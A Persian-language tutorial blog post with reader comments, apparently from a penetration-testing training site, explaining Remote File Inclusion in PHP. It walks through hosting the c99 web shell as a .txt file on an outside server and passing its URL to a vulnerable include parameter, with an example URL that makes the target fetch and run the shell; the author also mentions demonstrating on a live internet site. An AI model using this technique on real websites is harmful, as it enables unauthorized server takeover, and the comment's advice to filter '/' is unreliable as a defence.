باگ RFI چیست ؟ + اموزش

باگ RFI

اموزش تست نفوذ سایت با باگ RFI و اشنایی کامل با این حفره امنیتی در وب در ادامه اموزش هک با ما همراه باشید

اموزش باگ RFI

توضیحات

در اموزش قبل با باگ RCE به طور کامل اشنا شدیم اما باگ های مختلفی برای اپلیکیشن های تحت وب وجود دارد
که یکی دیگر از باگ های وب اپلیکیشن ها باگ RFI است که بسیار میتواند خطر ناک باشد
و مخفف Remote File Inclusion است که مستقیما باعث اجرای شل اسکریپت در سرور شود
و همچنین این حفره امنیتی از اشتباه های برنامه نویس ایجاد میشود
و حتما باید برای امنیت و جلوگیری از این باگ به زبان برنامه نویسی کاملا مسلط بوده
و باید ورودی های اپلیکیشن را کنترل کند و از فایروال های قدرتمند استفاده نمایید
باگ RFI چیست ؟ + اموزش

سطح دستریسی با باگ RFI

این باگ جز باگ های خطرناک محسوب میشود و دسترسی که نفوذگر میتواند با استفاده از این باگ بگیرد اجرای شل اسکریپت است
که در واقع با اجرای شل اسکریپت دسترسی نسبتا کاملی به سرور سایت تارگت خواهد داشت
اگر بخواهیم به طور متنی ان را توضیح دهیم هکر با دادن لینکی از شل اسکریپت به صورت txt به ورودی سایت اسیب پذیر شل را اجرا میکند
که در ادامه با مثال با نحوه کارکرد این باگ به طور کامل اشنا میشویم اشنا میشویم

نحوه باگ یابی و استفاده از RFI

برای پیدا کردن باگ RFI باید ورودی های مشکوک به این این باگ را پیدا کرده و در ان ها تست را انجام دهید
میتوانید از دانلود شل c99 را از اینجا انجام دهید
بعد از دریافت ان را در فایلی با پسوند .txt ذخیره کنید و در یک سرور ان را اپلود کنید
حال کافیست ادرس شل که در سرور خود اپلود کرده اید را به ورودی بدهید و مشاهده خواهید کرد که شل اسکریپت در سرور تارگت اجرا شده است

  آموزش پاورشل و نحوه کار با ان

باگ RFI چیست ؟ + اموزش

مثال

برای مثال ورودی ادرس زیر به باگ RFI اسیب پذیر است

http://site.com/index.php?m=site

در اینجا باید بجای ورودی سایت ادرس شلر خود را که در سرور دیگری به صورت txt ذخیره کرده بودیم را بدهیم

http://site.com/index.php?m=http://MyServer.com/ShellScript.txt

حال با زدن ان در url شل اسکریپت اجرا شده و دسترسی خواهید داشت.
 
امیدوارم از این اموزش باگ RFI استفاده لازم را کرده باشید
درصورتی که نیاز به اموزش ویدیو ای دارید در بخش دیدگاه ها بفرمایید تا قرار بگیرد
موفق باشید.

0/5 (0 نظر)

نیما حسینی هستم بنیان گذار تیم پن تست کور و مدرس دوره های تست نفوذ و امنیت ، در 5 سال گذشته متمرکز بر مباحث روز هک و امنیت بوده ام و بعد از کسب دانش و تجربه های ارزشمند تصمیم بر به اشتراک گذاری نتیجه ان ها با دیگران گرفته ام.

مطالب مرتبط

۱۰ دیدگاه در “باگ RFI چیست ؟ + اموزش”

  • Babk آبان ۱۶, ۱۳۹۷ پاسخ

    بسیار عالی از آموزش تون

    • Nima Nani آبان ۱۷, ۱۳۹۷ پاسخ

      تسکر از نظر لطف شما

  • AmirAliiBabaei65 آذر ۱۷, ۱۳۹۷ پاسخ

    سلام ممنون بابت آموزش ، اگه ممکنه آموزش ویدیویی بزارید

    • Nima Nani آذر ۱۷, ۱۳۹۷ پاسخ

      درود بله درصورت امکان قرار میگیرد
      موفق باشید

  • jadoogare30ah84 بهمن ۲۳, ۱۳۹۷ پاسخ

    سلام و عرض خسته نباشید
    تشکر میکنم از آموزش هاتون
    اگر میشه برای این آموزش از تارگت های خارجی استفاده کنید
    به اون صورت قابل درک تر هستش وقتی از نرم افزارwmapserver استفاده میکنید درکش خیلی سخت تره
    بازم ممنون

    • Nima Nani بهمن ۲۳, ۱۳۹۷ پاسخ

      درود و تشکر از شما کاربرگرامی
      بله در اموزش ویدیو ای که به زودی قرار میگیرد بر روی یک صفحه اسیب پذیر به صورت کامل تر توضیح داده میشود و در صورت امکان بر روی یک وبسایت در دنیای اینترنت هم انجام میشود

  • eyzed فروردین ۱۳, ۱۳۹۹ پاسخ

    سلام یعنی اگر از include استفاده کنیم این باگ به وجود میاد؟؟؟؟؟

    • نیما حسینی فروردین ۱۵, ۱۳۹۹ پاسخ

      درود
      بله وقتی ورودی در include وارد شود این اسیب پذیری به وجود می اید ، برای جلوگیری از این باگ هم می توانید / را فیلتر کنید.

  • دزد دریایی کارائیب خرداد ۱۵, ۱۳۹۹ پاسخ

    سلام و خداقوت، آموزش شما خوب بود ولی آموزش تا تصویری نباشد، به استخوان فهم ما نفوذ نمیکنه و بیشتر به داده‌ی سطحیه، امیدوارم بتونید [بخواهید؟] آموزش تصویری برای همه‌ی مطالبتون فراهم کنید، حتی اگه متن نباشه باز اون کامله، بازم ممنون

    • نیما حسینی خرداد ۱۷, ۱۳۹۹ پاسخ

      درود بر شما
      از نطرات شما سپاس گذاریم ، ما حتما سعی می کنیم اموزش ویدیو ای برای این اموزش هم قرار دهیم.

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *